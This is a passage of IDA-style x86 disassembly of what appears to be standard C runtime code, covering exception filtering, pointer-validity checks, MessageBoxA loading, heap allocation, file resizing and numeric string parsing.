call sub_41E2C9
pop ecx
retn
; =============== S U B R O U T I N E =======================================
sub_424F1C proc near ; DATA XREF: sub_424F62�o
; .data:0043D438�o ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi]
cmp dword ptr [eax], 0E06D7363h
jnz short loc_424F3F
cmp dword ptr [eax+10h], 3
jnz short loc_424F3F
cmp dword ptr [eax+14h], 19930520h
jnz short loc_424F3F
jmp sub_422DFC
; ---------------------------------------------------------------------------
loc_424F3F: ; CODE XREF: sub_424F1C+D�j
; sub_424F1C+13�j ...
mov eax, dword_4DBFE8
test eax, eax
jz short loc_424F5C
push eax
call sub_424FB8
test eax, eax
pop ecx
jz short loc_424F5C
push esi
call dword_4DBFE8
jmp short loc_424F5E
; ---------------------------------------------------------------------------
loc_424F5C: ; CODE XREF: sub_424F1C+2A�j
; sub_424F1C+35�j
xor eax, eax
loc_424F5E: ; CODE XREF: sub_424F1C+3E�j
pop esi
retn 4
sub_424F1C endp
; =============== S U B R O U T I N E =======================================
sub_424F62 proc near ; DATA XREF: .data:00429024�o
push offset sub_424F1C
call ds:dword_427010 ; SetUnhandledExceptionFilter
mov dword_4DBFE8, eax
retn
sub_424F62 endp
; =============== S U B R O U T I N E =======================================
sub_424F73 proc near ; DATA XREF: .data:0042903C�o
push dword_4DBFE8
call ds:dword_427010 ; SetUnhandledExceptionFilter
retn
sub_424F73 endp
; =============== S U B R O U T I N E =======================================
sub_424F80 proc near ; CODE XREF: sub_422651+6B�p
; sub_422B62+61�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push 1
pop esi
push [esp+4+arg_4]
push [esp+8+arg_0]
call ds:dword_42700C ; IsBadReadPtr
test eax, eax
jz short loc_424F98
xor esi, esi
loc_424F98: ; CODE XREF: sub_424F80+14�j
mov eax, esi
pop esi
retn
sub_424F80 endp
; =============== S U B R O U T I N E =======================================
sub_424F9C proc near ; CODE XREF: sub_422B62+73�p
; sub_422B62+BF�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push 1
pop esi
push [esp+4+arg_4]
push [esp+8+arg_0]
call ds:dword_427060 ; IsBadWritePtr
test eax, eax
jz short loc_424FB4
xor esi, esi
loc_424FB4: ; CODE XREF: sub_424F9C+14�j
mov eax, esi
pop esi
retn
sub_424F9C endp
; =============== S U B R O U T I N E =======================================
sub_424FB8 proc near ; CODE XREF: sub_422B62+15B�p
; sub_424F1C+2D�p
arg_0 = dword ptr 4
push esi
push 1
pop esi
push [esp+4+arg_0]
call ds:dword_427008 ; IsBadCodePtr
test eax, eax
jz short loc_424FCC
xor esi, esi
loc_424FCC: ; CODE XREF: sub_424FB8+10�j
mov eax, esi
pop esi
retn
sub_424FB8 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422DFC
loc_424FD0: ; CODE XREF: sub_422DFC:loc_422E4D�j
push 0Ah
call sub_423DD1
push 16h
call sub_425C06
pop ecx
pop ecx
push 3
call sub_41C1A2
; END OF FUNCTION CHUNK FOR sub_422DFC
; =============== S U B R O U T I N E =======================================
sub_424FE7 proc near ; CODE XREF: sub_42367B+2B�p
arg_0 = dword ptr 4
push 4
push 0
push [esp+8+arg_0]
call sub_424FF8
add esp, 0Ch
retn
sub_424FE7 endp
; =============== S U B R O U T I N E =======================================
sub_424FF8 proc near ; CODE XREF: sub_424FE7+8�p
arg_0 = byte ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
movzx eax, [esp+arg_0]
mov cl, [esp+arg_8]
test byte_4DD261[eax], cl
jnz short loc_425025
cmp [esp+arg_4], 0
jz short loc_42501E
movzx eax, word_43CE82[eax*2]
and eax, [esp+arg_4]
jmp short loc_425020
; ---------------------------------------------------------------------------
loc_42501E: ; CODE XREF: sub_424FF8+16�j
xor eax, eax
loc_425020: ; CODE XREF: sub_424FF8+24�j
test eax, eax
jnz short loc_425025
retn
; ---------------------------------------------------------------------------
loc_425025: ; CODE XREF: sub_424FF8+F�j
; sub_424FF8+2A�j
push 1
pop eax
retn
sub_424FF8 endp
; =============== S U B R O U T I N E =======================================
sub_425029 proc near ; CODE XREF: sub_423DD1+11F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
xor ebx, ebx
cmp dword_4DBFEC, ebx
push esi
push edi
jnz short loc_425078
push offset aUser32_dll ; "user32.dll"
call ds:dword_4270C0 ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_4250AE
mov esi, ds:dword_4270C4
push offset aMessageboxa ; "MessageBoxA"
push edi
call esi ; GetProcAddress
test eax, eax
mov dword_4DBFEC, eax
jz short loc_4250AE
push offset aGetactivewindo ; "GetActiveWindow"
push edi
call esi ; GetProcAddress
push offset aGetlastactivep ; "GetLastActivePopup"
push edi
mov dword_4DBFF0, eax
call esi ; GetProcAddress
mov dword_4DBFF4, eax
loc_425078: ; CODE XREF: sub_425029+B�j
mov eax, dword_4DBFF0
test eax, eax
jz short loc_425097
call eax
mov ebx, eax
test ebx, ebx
jz short loc_425097
mov eax, dword_4DBFF4
test eax, eax
jz short loc_425097
push ebx
call eax
mov ebx, eax
loc_425097: ; CODE XREF: sub_425029+56�j
; sub_425029+5E�j ...
push [esp+0Ch+arg_8]
push [esp+10h+arg_4]
push [esp+14h+arg_0]
push ebx
call dword_4DBFEC
loc_4250AA: ; CODE XREF: sub_425029+87�j
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_4250AE: ; CODE XREF: sub_425029+1C�j
; sub_425029+33�j
xor eax, eax
jmp short loc_4250AA
sub_425029 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4250B2 proc near ; CODE XREF: sub_42413E+22�p
; sub_42413E+3B�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
imul esi, [ebp+arg_4]
cmp esi, 0FFFFFFE0h
push edi
mov [ebp+arg_0], esi
ja short loc_4250D3
test esi, esi
jnz short loc_4250CD
push 1
pop esi
loc_4250CD: ; CODE XREF: sub_4250B2+16�j
add esi, 0Fh
and esi, 0FFFFFFF0h
loc_4250D3: ; CODE XREF: sub_4250B2+12�j
; sub_4250B2+94�j
xor edi, edi
cmp esi, 0FFFFFFE0h
ja short loc_425132
mov eax, dword_4DD388
cmp eax, 3
jnz short loc_4250FE
mov eax, [ebp+arg_0]
cmp eax, dword_4DD380
ja short loc_42511D
push eax
call sub_41EA6B
mov edi, eax
pop ecx
test edi, edi
jnz short loc_425148
jmp short loc_42511D
; ---------------------------------------------------------------------------
loc_4250FE: ; CODE XREF: sub_4250B2+30�j
cmp eax, 2
jnz short loc_42511D
cmp esi, dword_43CE74
ja short loc_42511D
mov eax, esi
shr eax, 4
push eax
call sub_41F50E
mov edi, eax
pop ecx
test edi, edi
jnz short loc_42515C
loc_42511D: ; CODE XREF: sub_4250B2+3B�j
; sub_4250B2+4A�j ...
push esi
push 8
push dword_4DD384
call ds:dword_427150 ; RtlAllocateHeap
mov edi, eax
test edi, edi
jnz short loc_425156
loc_425132: ; CODE XREF: sub_4250B2+26�j
cmp dword_4DBE48, 0
jz short loc_425156
push esi
call sub_41FBB2
test eax, eax
pop ecx
jz short loc_42515F
jmp short loc_4250D3
; ---------------------------------------------------------------------------
loc_425148: ; CODE XREF: sub_4250B2+48�j
push [ebp+arg_0]
loc_42514B: ; CODE XREF: sub_4250B2+AB�j
push 0
push edi
call sub_41BF70
add esp, 0Ch
loc_425156: ; CODE XREF: sub_4250B2+7E�j
; sub_4250B2+87�j
mov eax, edi
loc_425158: ; CODE XREF: sub_4250B2+AF�j
pop edi
pop esi
pop ebp
retn
; ---------------------------------------------------------------------------
loc_42515C: ; CODE XREF: sub_4250B2+69�j
push esi
jmp short loc_42514B
; ---------------------------------------------------------------------------
loc_42515F: ; CODE XREF: sub_4250B2+92�j
xor eax, eax
jmp short loc_425158
sub_4250B2 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4241E3
loc_425163: ; CODE XREF: sub_4241E3+E�j
push esi
push edi
push 3
xor edi, edi
pop esi
cmp dword_4DD020, esi
jle short loc_4251B6
loc_425172: ; CODE XREF: sub_4241E3+FD1�j
mov eax, dword_4DC01C
mov eax, [eax+esi*4]
test eax, eax
jz short loc_4251AD
test byte ptr [eax+0Ch], 83h
jz short loc_425191
push eax
call sub_41BA3B
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_425191
inc edi
loc_425191: ; CODE XREF: sub_4241E3+F9F�j
; sub_4241E3+FAB�j
cmp esi, 14h
jl short loc_4251AD
mov eax, dword_4DC01C
push dword ptr [eax+esi*4]
call sub_41BA91
mov eax, dword_4DC01C
pop ecx
and dword ptr [eax+esi*4], 0
loc_4251AD: ; CODE XREF: sub_4241E3+F99�j
; sub_4241E3+FB1�j
inc esi
cmp esi, dword_4DD020
jl short loc_425172
loc_4251B6: ; CODE XREF: sub_4241E3+F8D�j
mov eax, edi
pop edi
pop esi
retn
; END OF FUNCTION CHUNK FOR sub_4241E3
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4251BB proc near ; CODE XREF: sub_42423B+271�p
var_1000 = byte ptr -1000h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 1000h
call sub_41C500
push ebx
mov ebx, [ebp+arg_0]
push esi
xor esi, esi
cmp ebx, dword_4DD140
jnb loc_4252F0
mov eax, ebx
mov ecx, ebx
sar eax, 5
and ecx, 1Fh
mov eax, dword_4DD040[eax*4]
test byte ptr [eax+ecx*8+4], 1
jz loc_4252F0
push 1
push esi
push ebx
call sub_422F09
add esp, 0Ch
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz loc_4252FA
push 2
push esi
push ebx
call sub_422F09
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz loc_4252FA
push edi
mov edi, [ebp+arg_4]
sub edi, eax
test edi, edi
jle short loc_42529D
push 1000h
lea eax, [ebp+var_1000]
push esi
push eax
call sub_41BF70
loc_425240: ; DATA XREF: .data:off_438CB8�o
push 8000h
push ebx
call sub_425D78
add esp, 14h
mov [ebp+arg_4], eax
loc_425251: ; CODE XREF: sub_4251BB+BD�j
mov eax, 1000h
cmp edi, eax
jge short loc_42525C
mov eax, edi
loc_42525C: ; CODE XREF: sub_4251BB+9D�j
push eax
lea eax, [ebp+var_1000]
push eax
push ebx
call sub_4230FB
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz short loc_42527A
sub edi, eax
test edi, edi
jle short loc_425290
jmp short loc_425251
; ---------------------------------------------------------------------------
loc_42527A: ; CODE XREF: sub_4251BB+B5�j
cmp dword_4DBDE0, 5
jnz short loc_42528D
mov dword_4DBDDC, 0Dh
loc_42528D: ; CODE XREF: sub_4251BB+C6�j
or esi, 0FFFFFFFFh
loc_425290: ; CODE XREF: sub_4251BB+BB�j
push [ebp+arg_4]
push ebx
call sub_425D78
pop ecx
pop ecx
jmp short loc_4252DD
; ---------------------------------------------------------------------------
loc_42529D: ; CODE XREF: sub_4251BB+71�j
jge short loc_4252DD
push 0
push [ebp+arg_4]
push ebx
call sub_422F09
push ebx
call sub_4240AA
add esp, 10h
push eax
call ds:dword_427004 ; SetEndOfFile
mov esi, eax
neg esi
sbb esi, esi
neg esi
dec esi
cmp esi, 0FFFFFFFFh
jnz short loc_4252DD
mov dword_4DBDDC, 0Dh
call ds:dword_427094 ; RtlGetLastWin32Error
mov dword_4DBDE0, eax
loc_4252DD: ; CODE XREF: sub_4251BB+E0�j
; sub_4251BB:loc_42529D�j ...
push 0
push [ebp+arg_0]
push ebx
call sub_422F09
add esp, 0Ch
mov eax, esi
pop edi
jmp short loc_4252FD
; ---------------------------------------------------------------------------
loc_4252F0: ; CODE XREF: sub_4251BB+1A�j
; sub_4251BB+36�j
mov dword_4DBDDC, 9
loc_4252FA: ; CODE XREF: sub_4251BB+4E�j
; sub_4251BB+63�j
or eax, 0FFFFFFFFh
loc_4252FD: ; CODE XREF: sub_4251BB+133�j
pop esi
pop ebx
leave
retn
sub_4251BB endp
; =============== S U B R O U T I N E =======================================
sub_425301 proc near ; CODE XREF: sub_4249DF+2B�p
; sub_4249DF+42�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov edx, [esp+arg_0]
push esi
mov esi, [esp+4+arg_4]
xor eax, eax
lea ecx, [edx+esi]
cmp ecx, edx
jb short loc_425317
cmp ecx, esi
jnb short loc_42531A
loc_425317: ; CODE XREF: sub_425301+10�j
push 1
pop eax
loc_42531A: ; CODE XREF: sub_425301+14�j
mov edx, [esp+4+arg_8]
pop esi
mov [edx], ecx
retn
sub_425301 endp
; =============== S U B R O U T I N E =======================================
sub_425322 proc near ; CODE XREF: sub_4253DB+40�p
; sub_4253DB+61�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
push edi
mov edi, [esp+8+arg_4]
push esi
push dword ptr [edi]
push dword ptr [esi]
call sub_425301
add esp, 0Ch
test eax, eax
jz short loc_425354
lea eax, [esi+4]
push eax
push 1
push dword ptr [eax]
call sub_425301
add esp, 0Ch
test eax, eax
jz short loc_425354
inc dword ptr [esi+8]
loc_425354: ; CODE XREF: sub_425322+19�j
; sub_425322+2D�j
lea eax, [esi+4]
push eax
push dword ptr [edi+4]
push dword ptr [eax]
call sub_425301
add esp, 0Ch
test eax, eax
jz short loc_42536C
inc dword ptr [esi+8]
loc_42536C: ; CODE XREF: sub_425322+45�j
lea eax, [esi+8]
push eax
push dword ptr [edi+8]
push dword ptr [eax]
call sub_425301
add esp, 0Ch
pop edi
pop esi
retn
sub_425322 endp
; =============== S U B R O U T I N E =======================================
sub_425380 proc near ; CODE XREF: sub_4253DB+30�p
; sub_4253DB+36�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push esi
push edi
mov esi, [eax]
mov edi, [eax+4]
mov ecx, esi
add esi, esi
mov [eax], esi
lea esi, [edi+edi]
shr ecx, 1Fh
or esi, ecx
mov ecx, [eax+8]
mov edx, edi
mov [eax+4], esi
shr edx, 1Fh
shl ecx, 1
or ecx, edx
pop edi
mov [eax+8], ecx
pop esi
retn
sub_425380 endp
; =============== S U B R O U T I N E =======================================
sub_4253AE proc near ; CODE XREF: sub_425973+1C8�p
; sub_425DEE+17D�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push esi
push edi
mov edx, [eax+8]
mov ecx, [eax+4]
mov esi, edx
mov edi, ecx
shl esi, 1Fh
shr ecx, 1
or ecx, esi
mov [eax+4], ecx
mov ecx, [eax]
shl edi, 1Fh
shr ecx, 1
shr edx, 1
or ecx, edi
pop edi
mov [eax+8], edx
mov [eax], ecx
pop esi
retn
sub_4253AE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4253DB proc near ; CODE XREF: sub_4254A2+3CA�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
mov eax, [ebp+arg_4]
push ebx
mov ebx, [ebp+arg_8]
xor edx, edx
cmp eax, edx
push esi
mov [ebp+var_4], 404Eh
mov [ebx], edx
mov [ebx+4], edx
mov [ebx+8], edx
jbe short loc_42544F
push edi
mov [ebp+arg_8], eax
loc_425402: ; CODE XREF: sub_4253DB+6F�j
mov esi, ebx
lea edi, [ebp+var_10]
movsd
movsd
push ebx
movsd
call sub_425380
push ebx
call sub_425380
lea eax, [ebp+var_10]
push eax
push ebx
call sub_425322
push ebx
call sub_425380
mov eax, [ebp+arg_0]
and [ebp+var_C], 0
and [ebp+var_8], 0
movsx eax, byte ptr [eax]
mov [ebp+var_10], eax
lea eax, [ebp+var_10]
push eax
push ebx
call sub_425322
add esp, 1Ch
inc [ebp+arg_0]
dec [ebp+arg_8]
jnz short loc_425402
xor edx, edx
pop edi
loc_42544F: ; CODE XREF: sub_4253DB+21�j
; sub_4253DB+9F�j
cmp [ebx+8], edx
jnz short loc_42547C
mov ecx, [ebx+4]
mov eax, ecx
shr eax, 10h
mov [ebx+8], eax
mov eax, [ebx]
mov esi, eax
shr esi, 10h
shl ecx, 10h
or esi, ecx
shl eax, 10h
add [ebp+var_4], 0FFF0h
mov [ebx+4], esi
mov [ebx], eax
jmp short loc_42544F
; ---------------------------------------------------------------------------
loc_42547C: ; CODE XREF: sub_4253DB+77�j
mov esi, 8000h
loc_425481: ; CODE XREF: sub_4253DB+B9�j
test [ebx+8], esi
jnz short loc_425496
push ebx
call sub_425380
add [ebp+var_4], 0FFFFh
pop ecx
jmp short loc_425481
; ---------------------------------------------------------------------------
loc_425496: ; CODE XREF: sub_4253DB+A9�j
mov ax, word ptr [ebp+var_4]
pop esi
mov [ebx+0Ah], ax
pop ebx
leave
retn
sub_4253DB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4254A2 proc near ; CODE XREF: sub_424D28+17�p
; sub_424D55+17�p
var_5C = byte ptr -5Ch
var_45 = byte ptr -45h
var_40 = dword ptr -40h
var_3A = dword ptr -3Ah
var_36 = dword ptr -36h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 5Ch
push ebx
push esi
push edi
mov edi, [ebp+arg_8]
lea eax, [ebp+var_5C]
push 1
mov [ebp+var_C], eax
xor eax, eax
pop edx
mov [ebp+var_28], eax
mov [ebp+var_18], edx
mov [ebp+var_4], eax
mov [ebp+var_10], eax
mov [ebp+var_24], eax
mov [ebp+var_20], eax
mov [ebp+var_2C], eax
mov [ebp+var_30], eax
mov [ebp+var_1C], eax
mov [ebp+var_8], eax
mov [ebp+var_14], eax
mov [ebp+arg_8], edi
loc_4254DD: ; CODE XREF: sub_4254A2+52�j
mov cl, [edi]
cmp cl, 20h
jz short loc_4254F3
cmp cl, 9
jz short loc_4254F3
cmp cl, 0Ah
jz short loc_4254F3
cmp cl, 0Dh
jnz short loc_4254F6
loc_4254F3: ; CODE XREF: sub_4254A2+40�j
; sub_4254A2+45�j ...
inc edi
jmp short loc_4254DD
; ---------------------------------------------------------------------------
loc_4254F6: ; CODE XREF: sub_4254A2+4F�j
push 4
pop esi
loc_4254F9: ; CODE XREF: sub_4254A2+AE�j
; sub_4254A2+B7�j ...
mov bl, [edi]
inc edi
cmp eax, 0Bh ; switch 12 cases
ja loc_42577C ; default
; jumptable 00425505 case 10
jmp ds:off_425943[eax*4] ; switch jump
loc_42550C: ; DATA XREF: .text:off_425943�o
cmp bl, 31h ; jumptable 00425505 case 0
jl short loc_42551D
cmp bl, 39h
jg short loc_42551D
loc_425516: ; CODE XREF: sub_4254A2+C4�j
; sub_4254A2+118�j
push 3
jmp loc_42573A
; ---------------------------------------------------------------------------
loc_42551D: ; CODE XREF: sub_4254A2+6D�j
; sub_4254A2+72�j
cmp bl, byte_43D088
jnz short loc_42552C
loc_425525: ; CODE XREF: sub_4254A2+124�j
push 5
jmp loc_425772
; ---------------------------------------------------------------------------
loc_42552C: ; CODE XREF: sub_4254A2+81�j
movsx eax, bl
sub eax, 2Bh
jz short loc_425552
dec eax
dec eax
jz short loc_425546
sub eax, 3
jnz loc_425815
jmp loc_4255D5
; ---------------------------------------------------------------------------
loc_425546: ; CODE XREF: sub_4254A2+94�j
push 2
mov [ebp+var_28], 8000h
pop eax
jmp short loc_4254F9
; ---------------------------------------------------------------------------
loc_425552: ; CODE XREF: sub_4254A2+90�j
and [ebp+var_28], 0
push 2
pop eax
jmp short loc_4254F9
; ---------------------------------------------------------------------------
loc_42555B: ; CODE XREF: sub_4254A2+63�j
; DATA XREF: .text:off_425943�o
cmp bl, 31h ; jumptable 00425505 case 1
mov [ebp+var_10], edx
jl short loc_425568
cmp bl, 39h
jle short loc_425516
loc_425568: ; CODE XREF: sub_4254A2+BF�j
cmp bl, byte_43D088
jz loc_425630
cmp bl, 2Bh
jz short loc_4255AA
cmp bl, 2Dh
jz short loc_4255AA
cmp bl, 30h
jz short loc_4255D5
loc_425583: ; CODE XREF: sub_4254A2+207�j
cmp bl, 43h
jle loc_425815
cmp bl, 45h
jle short loc_4255A3
cmp bl, 63h
jle loc_425815
cmp bl, 65h
jg loc_425815
loc_4255A3: ; CODE XREF: sub_4254A2+ED�j
push 6
jmp loc_425772
; ---------------------------------------------------------------------------
loc_4255AA: ; CODE XREF: sub_4254A2+D5�j
; sub_4254A2+DA�j ...
dec edi
push 0Bh
jmp loc_425772
; ---------------------------------------------------------------------------
loc_4255B2: ; CODE XREF: sub_4254A2+63�j
; DATA XREF: .text:off_425943�o
cmp bl, 31h ; jumptable 00425505 case 2
jl short loc_4255C0
cmp bl, 39h
jle loc_425516
loc_4255C0: ; CODE XREF: sub_4254A2+113�j
cmp bl, byte_43D088
jz loc_425525
cmp bl, 30h
jnz loc_42578A
loc_4255D5: ; CODE XREF: sub_4254A2+9F�j
; sub_4254A2+DF�j
mov eax, edx
jmp loc_4254F9
; ---------------------------------------------------------------------------
loc_4255DC: ; CODE XREF: sub_4254A2+63�j
; DATA XREF: .text:off_425943�o
mov [ebp+var_10], edx ; jumptable 00425505 case 3
loc_4255DF: ; CODE XREF: sub_4254A2+184�j
cmp dword_43D084, edx
jle short loc_4255F8
movzx eax, bl
push esi
push eax
call sub_41FDB5
pop ecx
pop ecx
push 1
pop edx
jmp short loc_425606
; ---------------------------------------------------------------------------
loc_4255F8: ; CODE XREF: sub_4254A2+143�j
mov ecx, off_43CE78
movzx eax, bl
mov al, [ecx+eax*2]
and eax, esi
loc_425606: ; CODE XREF: sub_4254A2+154�j
test eax, eax
jz short loc_425628
cmp [ebp+var_4], 19h
jnb short loc_425620
mov eax, [ebp+var_C]
inc [ebp+var_4]
sub bl, 30h
inc [ebp+var_C]
mov [eax], bl
jmp short loc_425623
; ---------------------------------------------------------------------------
loc_425620: ; CODE XREF: sub_4254A2+16C�j
inc [ebp+var_8]
loc_425623: ; CODE XREF: sub_4254A2+17C�j
mov bl, [edi]
inc edi
jmp short loc_4255DF
; ---------------------------------------------------------------------------
loc_425628: ; CODE XREF: sub_4254A2+166�j
cmp bl, byte_43D088
jnz short loc_425697
loc_425630: ; CODE XREF: sub_4254A2+CC�j
mov eax, esi
jmp loc_4254F9
; ---------------------------------------------------------------------------
loc_425637: ; CODE XREF: sub_4254A2+63�j
; DATA XREF: .text:off_425943�o
cmp [ebp+var_4], 0 ; jumptable 00425505 case 4
mov [ebp+var_10], edx
mov [ebp+var_24], edx
jnz short loc_425650
loc_425643: ; CODE XREF: sub_4254A2+1AC�j
cmp bl, 30h
jnz short loc_425650
dec [ebp+var_8]
mov bl, [edi]
inc edi
jmp short loc_425643
; ---------------------------------------------------------------------------
loc_425650: ; CODE XREF: sub_4254A2+19F�j
; sub_4254A2+1A4�j ...
cmp dword_43D084, edx
jle short loc_425669
movzx eax, bl
push esi
push eax
call sub_41FDB5
pop ecx
pop ecx
push 1
pop edx
jmp short loc_425677
; ---------------------------------------------------------------------------
loc_425669: ; CODE XREF: sub_4254A2+1B4�j
mov ecx, off_43CE78
movzx eax, bl
mov al, [ecx+eax*2]
and eax, esi
loc_425677: ; CODE XREF: sub_4254A2+1C5�j
test eax, eax
jz short loc_425697
cmp [ebp+var_4], 19h
jnb short loc_425692
mov eax, [ebp+var_C]
inc [ebp+var_4]
sub bl, 30h
inc [ebp+var_C]
dec [ebp+var_8]
mov [eax], bl
loc_425692: ; CODE XREF: sub_4254A2+1DD�j
mov bl, [edi]
inc edi
jmp short loc_425650
; ---------------------------------------------------------------------------
loc_425697: ; CODE XREF: sub_4254A2+18C�j
; sub_4254A2+1D7�j
cmp bl, 2Bh
jz loc_4255AA
cmp bl, 2Dh
jz loc_4255AA
jmp loc_425583
; ---------------------------------------------------------------------------
loc_4256AE: ; CODE XREF: sub_4254A2+63�j
; DATA XREF: .text:off_425943�o
cmp dword_43D084, edx ; jumptable 00425505 case 5
mov [ebp+var_24], edx
jle short loc_4256CA
movzx eax, bl
push esi
push eax
call sub_41FDB5
pop ecx
pop ecx
push 1
pop edx
jmp short loc_4256D8
; ---------------------------------------------------------------------------
loc_4256CA: ; CODE XREF: sub_4254A2+215�j
mov ecx, off_43CE78
movzx eax, bl
mov al, [ecx+eax*2]
and eax, esi
loc_4256D8: ; CODE XREF: sub_4254A2+226�j
test eax, eax
jz loc_42578A
mov eax, esi
jmp short loc_42573B
; ---------------------------------------------------------------------------
loc_4256E4: ; CODE XREF: sub_4254A2+63�j
; DATA XREF: .text:off_425943�o
lea ecx, [edi-2] ; jumptable 00425505 case 6
cmp bl, 31h
mov [ebp+arg_8], ecx
jl short loc_4256F4
cmp bl, 39h
jle short loc_425738
loc_4256F4: ; CODE XREF: sub_4254A2+24B�j
movsx eax, bl
sub eax, 2Bh
jz short loc_425770
dec eax
dec eax
jz short loc_425764
sub eax, 3
jnz loc_425818
loc_425709: ; CODE XREF: sub_4254A2+2A4�j
push 8
jmp short loc_425772
; ---------------------------------------------------------------------------
loc_42570D: ; CODE XREF: sub_4254A2+63�j
; DATA XREF: .text:off_425943�o
mov [ebp+var_20], edx ; jumptable 00425505 case 8
loc_425710: ; CODE XREF: sub_4254A2+276�j
cmp bl, 30h
jnz short loc_42571A
mov bl, [edi]
inc edi
jmp short loc_425710
; ---------------------------------------------------------------------------
loc_42571A: ; CODE XREF: sub_4254A2+271�j
cmp bl, 31h
jl loc_425815
cmp bl, 39h
jg loc_425815
jmp short loc_425738
; ---------------------------------------------------------------------------
loc_42572E: ; CODE XREF: sub_4254A2+63�j
; DATA XREF: .text:off_425943�o
cmp bl, 31h ; jumptable 00425505 case 7
jl short loc_425741
cmp bl, 39h
jg short loc_425741
loc_425738: ; CODE XREF: sub_4254A2+250�j
; sub_4254A2+28A�j
push 9
loc_42573A: ; CODE XREF: sub_4254A2+76�j
pop eax
loc_42573B: ; CODE XREF: sub_4254A2+240�j
dec edi
jmp loc_4254F9
; ---------------------------------------------------------------------------
loc_425741: ; CODE XREF: sub_4254A2+28F�j
; sub_4254A2+294�j
cmp bl, 30h
jnz short loc_42578A
jmp short loc_425709
; ---------------------------------------------------------------------------
loc_425748: ; CODE XREF: sub_4254A2+63�j
; DATA XREF: .text:off_425943�o
cmp [ebp+arg_18], 0 ; jumptable 00425505 case 11
jz short loc_425778
movsx eax, bl
lea ecx, [edi-1]
sub eax, 2Bh
mov [ebp+arg_8], ecx
jz short loc_425770
dec eax
dec eax
jnz loc_425818
loc_425764: ; CODE XREF: sub_4254A2+25C�j
or [ebp+var_18], 0FFFFFFFFh
push 7
pop eax
jmp loc_4254F9
; ---------------------------------------------------------------------------
loc_425770: ; CODE XREF: sub_4254A2+258�j
; sub_4254A2+2B8�j
push 7
loc_425772: ; CODE XREF: sub_4254A2+85�j
; sub_4254A2+103�j ...
pop eax
jmp loc_4254F9
; ---------------------------------------------------------------------------
loc_425778: ; CODE XREF: sub_4254A2+2AA�j
push 0Ah
dec edi
pop eax
loc_42577C: ; CODE XREF: sub_4254A2+5D�j
; sub_4254A2+63�j
; DATA XREF: ...
cmp eax, 0Ah ; default
; jumptable 00425505 case 10
jz loc_42581A
jmp loc_4254F9
; ---------------------------------------------------------------------------
loc_42578A: ; CODE XREF: sub_4254A2+12D�j
; sub_4254A2+238�j ...
mov edi, [ebp+arg_8]
jmp loc_42581A
; ---------------------------------------------------------------------------
loc_425792: ; CODE XREF: sub_4254A2+63�j
; DATA XREF: .text:off_425943�o
mov [ebp+var_20], 1 ; jumptable 00425505 case 9
xor esi, esi
loc_42579B: ; CODE XREF: sub_4254A2+339�j
cmp dword_43D084, 1
jle short loc_4257B3
movzx eax, bl
push 4
push eax
call sub_41FDB5
pop ecx
pop ecx
jmp short loc_4257C2
; ---------------------------------------------------------------------------
loc_4257B3: ; CODE XREF: sub_4254A2+300�j
mov ecx, off_43CE78
movzx eax, bl
mov al, [ecx+eax*2]
and eax, 4
loc_4257C2: ; CODE XREF: sub_4254A2+30F�j
test eax, eax
jz short loc_4257E2
movsx ecx, bl
lea eax, [esi+esi*4]
lea esi, [ecx+eax*2-30h]
cmp esi, 1450h
jg short loc_4257DD
mov bl, [edi]
inc edi
jmp short loc_42579B
; ---------------------------------------------------------------------------
loc_4257DD: ; CODE XREF: sub_4254A2+334�j
mov esi, 1451h
loc_4257E2: ; CODE XREF: sub_4254A2+322�j
mov [ebp+var_1C], esi
loc_4257E5: ; CODE XREF: sub_4254A2+371�j
cmp dword_43D084, 1
jle short loc_4257FD
movzx eax, bl
push 4
push eax
call sub_41FDB5
pop ecx
pop ecx
jmp short loc_42580C
; ---------------------------------------------------------------------------
loc_4257FD: ; CODE XREF: sub_4254A2+34A�j
mov ecx, off_43CE78
movzx eax, bl
mov al, [ecx+eax*2]
and eax, 4
loc_42580C: ; CODE XREF: sub_4254A2+359�j
test eax, eax
jz short loc_425815
mov bl, [edi]
inc edi
jmp short loc_4257E5
; ---------------------------------------------------------------------------
loc_425815: ; CODE XREF: sub_4254A2+99�j
; sub_4254A2+E4�j ...
